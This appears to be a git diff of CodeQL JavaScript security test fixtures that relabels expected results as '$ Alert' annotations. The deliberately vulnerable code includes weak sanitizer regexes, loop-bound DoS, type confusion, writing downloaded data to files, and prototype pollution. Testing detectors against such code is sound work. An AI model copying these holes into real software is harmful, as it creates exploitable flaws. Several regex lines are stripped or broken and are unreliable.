a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js @@ -1,14 +1,14 @@ // CVE-2019-10756 (function(content) { - content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // NOT OK - content = content.replace(/ on\w+=".*"/g, ""); // NOT OK - content = content.replace(/ on\w+=\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // $ Alert + content = content.replace(/ on\w+=".*"/g, ""); // $ Alert + content = content.replace(/ on\w+=\'.*\'/g, ""); // $ Alert return content; }); (function(content) { - content = content.replace(/<.*cript.*/gi, ""); // NOT OK - content = content.replace(/.on\w+=.*".*"/g, ""); // NOT OK - content = content.replace(/.on\w+=.*\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*/gi, ""); // $ Alert + content = content.replace(/.on\w+=.*".*"/g, ""); // $ Alert + content = content.replace(/.on\w+=.*\'.*\'/g, ""); // $ Alert return content; }); @@ -16,18 +16,18 @@ // CVE-2020-7656 (function(responseText) { var rscript = /)<[^<]*)*<\/script>/gi; - responseText.replace(rscript, ""); // NOT OK + responseText.replace(rscript, ""); // $ Alert return responseText; }); // CVE-2019-1010091 (function(text) { - text = text.replace(//gm, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/g, ""); // NOT OK (ng-attributes) + x = x.replace(//gm, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/g, ""); // $ Alert - ng-attributes - x = x.replace(/()/g, "\n"); // OK: not a sanitizer + x = x.replace(/()/g, "\n"); // OK - not a sanitizer - x = x.replace(//g, ""); // OK [INCONSISTENCY] - x = x.replace(/> - > - - + > + > + > + + - - - + + + - + - - + \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js index bca6567b4f5e..324197179d2f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js @@ -17,7 +17,7 @@ rootRoute.post(function(req, res) { function problem(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert ret.push(val[i]); } } @@ -26,7 +26,7 @@ function whileLoop(val) { var ret = []; var i = 0; - while (i < val.length) { // NOT OK! + while (i < val.length) { // $ Alert ret.push(val[i]); i++; } @@ -35,7 +35,7 @@ function whileLoop(val) { function useLengthIndirectly(val) { var ret = []; - var len = val.length; // NOT OK! + var len = val.length; // $ Alert for (var i = 0; i < len; i++) { ret.push(val[i]); @@ -48,7 +48,7 @@ function noNullPointer(val) { const c = 0; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert // Constantly accessing element 0, therefore not guaranteed null-pointer. ret.push(val[c].foo); diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js index 3193a384aca2..923416c35b8e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert for (var k = 0; k < 2; k++) { if (k == 3) { // Does not prevent DoS, because this is inside an inner loop. @@ -31,7 +31,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { try { throw 2; // Is caught, and therefore the DoS is not prevented. @@ -46,7 +46,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { (function (i) { return i+2; // Does not prevent DoS. @@ -57,7 +57,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // NOT OK! + _.map(val, function (e) { // $ Alert if (!e) { try { throw new Error(); // Does not prevent DoS. diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js index 705ec6b5b0ea..71586956dad2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { break; // Prevents DoS. } @@ -28,7 +28,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { throw 2; // Prevents DoS. } @@ -40,7 +40,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { return 2; // Prevents DoS. } @@ -49,7 +49,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // OK + _.map(val, function (e) { if (!e) { throw new Error(); // Prevents DoS. } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js index 49c813834450..ddd0dcf3301d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js @@ -23,7 +23,7 @@ function sanitized(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -35,7 +35,7 @@ function sanitized2(val) { return []; } // Val can only be a primitive. Therefore no issue! - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -53,7 +53,7 @@ function sanitized3(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -67,7 +67,7 @@ function sanitized4(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js index 2f2fdb0d67a0..548d0fc944a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js @@ -10,5 +10,5 @@ rootRoute.post(function(req, res) { }); function problem(val) { - _.chunk(val, 2); // NOT OK! + _.chunk(val, 2); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js index 22649392557e..a9817883f082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js @@ -16,7 +16,7 @@ function problem(val) { return []; } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js index b8e4b1f50971..bd3aed633ff5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js @@ -21,7 +21,7 @@ rootRoute.post(function(req, res) { function nullPointer(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo + 42); } } @@ -30,7 +30,7 @@ function nullPointer(val) { function nullPointer2(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { var element = val[i]; ret.push(element.foo + 42); } @@ -38,7 +38,7 @@ function nullPointer2(val) { function nullPointer3(val) { let arr = val.messaging - for (let i = 0; i < arr.length; i++) { // OK + for (let i = 0; i < arr.length; i++) { let event = val.messaging[i] let sender = event.sender.id } @@ -46,13 +46,13 @@ function nullPointer3(val) { function lodashPointer(val) { - return _.map(val, function(e) { // OK + return _.map(val, function(e) { return e.foo; }) } function lodashArrowFunc(val) { - return _.map(val, (e) => { // OK + return _.map(val, (e) => { return e.foo; }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js index bbbe3a9eb7ee..ac456fbdbd94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js @@ -14,11 +14,11 @@ function nullPointer(val) { var ret = []; // Has obvious null-pointer. And guards the next loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo); } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index 3f5840b9f080..d859f2ade6e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -3,59 +3,59 @@ var Koa = require('koa'); express().get('/some/path', function (req, res) { var foo = req.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert - foo.concat(); // NOT OK + foo.concat(); // $ Alert function f() { - foo.concat(); // NOT OK + foo.concat(); // $ Alert } function g(bar) { - bar.concat(); // NOT OK + bar.concat(); // $ Alert } g(foo); - req.url.indexOf(); // OK + req.url.indexOf(); - foo.indexOf(prefix) === 0; // OK - foo.indexOf(prefix) == 0; // OK - foo.indexOf(prefix) !== 0; // OK + foo.indexOf(prefix) === 0; + foo.indexOf(prefix) == 0; + foo.indexOf(prefix) !== 0; - foo.slice(-1) === 'x'; // OK + foo.slice(-1) === 'x'; - foo.indexOf(prefix) == 1; // NOT OK - foo.slice(1) === 'x'; // NOT OK + foo.indexOf(prefix) == 1; // $ Alert + foo.slice(1) === 'x'; // $ Alert if (typeof foo === "string") { - foo.indexOf(); // OK + foo.indexOf(); } else { - foo.indexOf(); // OK + foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // OK, but still flagged [INCONSISTENCY] + foo.indexOf(); // $ SPURIOUS: Alert } - (foo + f()).indexOf(); // OK + (foo + f()).indexOf(); - foo.length; // NOT OK + foo.length; // $ Alert }); new Koa().use(function handler(ctx) { var foo = ctx.request.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert }); express().get('/some/path/:foo', function (req, res) { var foo = req.params.foo; - foo.indexOf(); // OK + foo.indexOf(); }); express().get('/some/path/:foo', function (req, res) { - if (req.query.path.length) { } // OK - req.query.path.length == 0; // OK - !req.query.path.length; // OK - req.query.path.length > 0; // OK + if (req.query.path.length) { } + req.query.path.length == 0; + !req.query.path.length; + req.query.path.length > 0; }); express().get('/some/path/:foo', function (req, res) { @@ -65,11 +65,11 @@ express().get('/some/path/:foo', function (req, res) { return; } - while (p.length) { // OK + while (p.length) { p = p.substr(1); } - p.length < 1; // OK + p.length < 1; }); express().get('/some/path/:foo', function (req, res) { @@ -78,8 +78,8 @@ express().get('/some/path/:foo', function (req, res) { }); function safeGet(obj, p) { - if (p === '__proto__' || // NOT OK - could be singleton array - p === 'constructor') { // NOT OK - could be singleton array + if (p === '__proto__' || // $ Alert - could be singleton array + p === 'constructor') { // $ Alert - could be singleton array return null; } return obj[p]; @@ -87,24 +87,24 @@ function safeGet(obj, p) { express().get('/foo', function (req, res) { let data = req.query; - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } if (typeof data.foo !== 'string') { - data.foo.indexOf(); // OK + data.foo.indexOf(); } if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } }); express().get('/foo', function (req, res) { let data = req.query.data; - data.indexOf(); // NOT OK + data.indexOf(); // $ Alert if (Array.isArray(data)) { - data.indexOf(); // OK + data.indexOf(); } else { - data.indexOf(); // OK + data.indexOf(); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-912/tst.js b/javascript/ql/test/query-tests/Security/CWE-912/tst.js index 78acef7d3aad..88e7827a480c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js @@ -13,27 +13,27 @@ try { (response) => { response.setEncoding('utf8'); response.on('data', (c) => { - fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file + fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file let writeStream = fs.createWriteStream('/usr/evil/evil.cmd'); - writeStream.write(c); // BAD: data from response 'on' event flows to filestream write + writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write writeStream.end(); var stream = fs.createWriteStream("my_file.txt"); stream.once('open', function (fd) { - stream.write(c); // BAD: data from response 'on' event flows to filestream write + stream.write(c); // $ Alert - data from response 'on' event flows to filestream write stream.end(); }); }); response.on('error', () => { - fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file + fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file }); }).on('error', () => { let error = "error occured"; let writeStream = fs.createWriteStream('/usr/good/errorlog.txt'); - writeStream.write(error); // GOOD: static data written to file stream + writeStream.write(error); // OK - static data written to file stream writeStream.end(); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index fb550533d124..6acf7ef2df10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -3,7 +3,7 @@ module.exports.set = function recSet(obj, path, value) { var currentValue = obj[currentPath]; if (path.length === 1) { if (currentValue === void 0) { - obj[currentPath] = value; // NOT OK + obj[currentPath] = value; // $ Alert } return currentValue; } @@ -12,18 +12,18 @@ module.exports.set = function recSet(obj, path, value) { } module.exports.set2 = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs = function() { var obj = arguments[0]; var path = arguments[1]; var value = arguments[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.usedInTest = function (obj, path, value) { - return obj[path[0]][path[1]] = value; // NOT OK + return obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs2 = function() { @@ -31,7 +31,7 @@ module.exports.setWithArgs2 = function() { var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs3 = function() { @@ -39,7 +39,7 @@ module.exports.setWithArgs3 = function() { var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } function id(s) { @@ -52,7 +52,7 @@ module.exports.notVulnerable = function () { const path = id("x"); const value = id("y"); const obj = id("z"); - return (obj[path[0]][path[1]] = value); // OK + return (obj[path[0]][path[1]] = value); } class Foo { @@ -67,12 +67,12 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // NOT OK + return (obj[path[0]][path[1]] = value); // $ Alert } safe() { const obj = this.obj; - obj[path[0]] = this.value; // OK + obj[path[0]] = this.value; } } @@ -81,10 +81,10 @@ module.exports.Foo = Foo; module.exports.delete = function() { var obj = arguments[0]; var path = arguments[1]; - delete obj[path[0]]; // OK + delete obj[path[0]]; var prop = arguments[2]; var proto = obj[path[0]]; - delete proto[prop]; // NOT OK + delete proto[prop]; // $ Alert } module.exports.fixedProp = function (obj, path, value) { @@ -105,18 +105,18 @@ module.exports.sanWithFcuntion = function() { var two = arguments[2]; var value = arguments[3]; - obj[one][two] = value; // NOT OK + obj[one][two] = value; // $ Alert if (isPossibilityOfPrototypePollution(one) || isPossibilityOfPrototypePollution(two)) { throw new Error('Prototype pollution is not allowed'); } - obj[one][two] = value; // OK + obj[one][two] = value; } module.exports.returnsObj = function () { return { set: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } } } @@ -125,7 +125,7 @@ class MyClass { constructor() {} set(obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } static staticSet(obj, path, value) { diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js index d74de12493aa..f8ed4b8235ab 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js @@ -1,3 +1,3 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js index 4d3e7a82f5c8..e15bbf81cddd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js @@ -3,7 +3,7 @@ Foobar.prototype = { method: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js index 66db628cfcc0..1a662007b49a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js @@ -1,5 +1,5 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } var other = require('./other') diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js index a622a8913905..770df9ab2cf1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js @@ -5,50 +5,50 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK - object[taint].foo = 'bar'; // NOT OK - may pollute, although attacker has no control over data being injected - object.baz[taint] = taint; // OK + object[taint][taint] = taint; // $ Alert + object[taint].foo = 'bar'; // $ Alert - may pollute, although attacker has no control over data being injected + object.baz[taint] = taint; mutateObject(object[taint], 'blah'); - unsafeGetProp(object, taint).foo = 'bar'; // NOT OK - unsafeGetProp(object, 'safe').foo = 'bar'; // OK + unsafeGetProp(object, taint).foo = 'bar'; // $ Alert + unsafeGetProp(object, 'safe').foo = 'bar'; - safeGetProp(object, taint).foo = 'bar'; // OK + safeGetProp(object, taint).foo = 'bar'; let possiblyProto = object[taint] || new Box(); possiblyProto.m(); let prototypeLessObject = Object.create(null); - prototypeLessObject[taint][taint] = taint; // OK + prototypeLessObject[taint][taint] = taint; let directlyMutated = {}; directlyMutated[taint] = taint; // OK - can't affect Object.prototype if (object.hasOwnProperty(taint)) { - object[taint].foo = 'bar'; // OK + object[taint].foo = 'bar'; } }); function mutateObject(obj, x) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert if (obj instanceof Object) { - obj.foo = x; // OK + obj.foo = x; } if (obj != null) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'function') { - obj.foo = x; // OK + obj.foo = x; } if (typeof obj !== 'function') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'object') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj !== 'object') { - obj.foo = x; // OK + obj.foo = x; } } @@ -77,39 +77,39 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert - object["" + taint]["" + taint] = taint; // NOT OK + object["" + taint]["" + taint] = taint; // $ Alert if (!taint.includes("__proto__")) { - object[taint][taint] = taint; // OK + object[taint][taint] = taint; } else { - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert } }); app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace('_', '-')].x = 'foo'; // OK - obj[req.query.x.replace('_', '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(/_/g, '')].x = 'foo'; // OK - obj[req.query.x.replace(/_/g, '-')].x = 'foo'; // OK - obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // NOT OK - "__pr__proto__oto__" - obj[req.query.x.replace('o', '0')].x = 'foo'; // OK + obj[req.query.x.replace('_', '-')].x = 'foo'; + obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(/_/g, '')].x = 'foo'; + obj[req.query.x.replace(/_/g, '-')].x = 'foo'; + obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // $ Alert - "__pr__proto__oto__" + obj[req.query.x.replace('o', '0')].x = 'foo'; }); app.get('/bar', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert const bad = ["__proto__", "constructor"]; if (bad.includes(taint)) { return; } - object[taint][taint] = taint; // OK + object[taint][taint] = taint; }); app.get('/assign', (req, res) => { @@ -126,7 +126,7 @@ app.get('/assign', (req, res) => { app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; // OK - obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; // OK + obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; + obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js index c7285a3ac1bd..c53d6f20aca1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js @@ -12,7 +12,7 @@ function assignToPath(target, path, value) { } target = target[key]; } else { - target[key] = value; // NOT OK + target[key] = value; // $ Alert } } } @@ -28,7 +28,7 @@ function assignToPathSafe(target, path, value) { } target = target[key]; } else { - target[key] = value; // OK + target[key] = value; } } } @@ -41,7 +41,7 @@ function assignToPathAfterLoop(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function splitHelper(path, sep) { @@ -58,7 +58,7 @@ function assignToPathWithHelper(target, path, value, sep) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function spltOnRegexp(target, path, value) { @@ -68,5 +68,5 @@ function spltOnRegexp(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index 14a0a19fb626..ad420927a5c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -5,7 +5,7 @@ function copyUsingForIn(dst, src) { if (dst[key]) { copyUsingForIn(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -15,7 +15,7 @@ function copyUsingKeys(dst, src) { if (dst[key]) { copyUsingKeys(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -33,7 +33,7 @@ function copyRestAux(dst, value, key) { if (dstValue) { copyRest(dstValue, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } @@ -43,7 +43,7 @@ function copyProtoGuarded(dst, src) { if (dst[key]) { copyProtoGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -54,7 +54,7 @@ function copyCtorGuarded(dst, src) { if (dst[key]) { copyCtorGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -65,7 +65,7 @@ function copyDoubleGuarded(dst, src) { if (dst[key]) { copyDoubleGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -80,7 +80,7 @@ function copyComplex(dst, src) { if (dst[key]) { copyComplex(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -93,7 +93,7 @@ function copyHasOwnProperty(dst, src) { if (dst.hasOwnProperty(key)) { copyHasOwnProperty(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -106,7 +106,7 @@ function copyHasOwnPropertyBad(dst, src) { if (dst[key]) { copyHasOwnPropertyBad(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -118,21 +118,21 @@ function copyHasOwnPropertyTearOff(dst, src) { if (_hasOwnProp.call(dst, key)) { copyHasOwnPropertyTearOff(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function shallowExtend(dst, src) { for (let key in src) { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } function transform(src, fn) { if (typeof src !== 'object') return fn(src); for (let key in src) { - src[key] = transform(src[key], fn); // OK + src[key] = transform(src[key], fn); } return src; } @@ -141,7 +141,7 @@ function clone(src) { if (typeof src !== 'object') return src; let result = {}; for (let key in src) { - result[key] = clone(src[key]); // OK + result[key] = clone(src[key]); } return result; } @@ -151,7 +151,7 @@ function higherOrderRecursion(dst, src, callback) { if (dst[key]) { callback(dst, src, key); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -168,7 +168,7 @@ function instanceofObjectGuard(dst, src) { if (typeof dstValue === 'object' && dstValue instanceof Object) { instanceofObjectGuard(dstValue, src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -181,7 +181,7 @@ function copyWithBlacklist(dst, src) { if (dst[key]) { copyWithBlacklist(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -193,7 +193,7 @@ function copyUsingPlainForLoop(dst, src) { if (dst[key]) { copyUsingPlainForLoop(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -205,7 +205,7 @@ function copyUsingPlainForLoopNoAlias(dst, src) { if (dst[key]) { copyUsingPlainForLoopNoAlias(dst[keys[i]], src[keys[i]]); } else { - dst[keys[i]] = src[keys[i]]; // NOT OK - but not flagged + dst[keys[i]] = src[keys[i]]; // $ MISSING: Alert } } } @@ -214,7 +214,7 @@ function deepSet(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // OK + map[key1][key2] = value; } function deepSetCaller(data) { @@ -230,7 +230,7 @@ function deepSetBad(map, key1, key2, value) { if 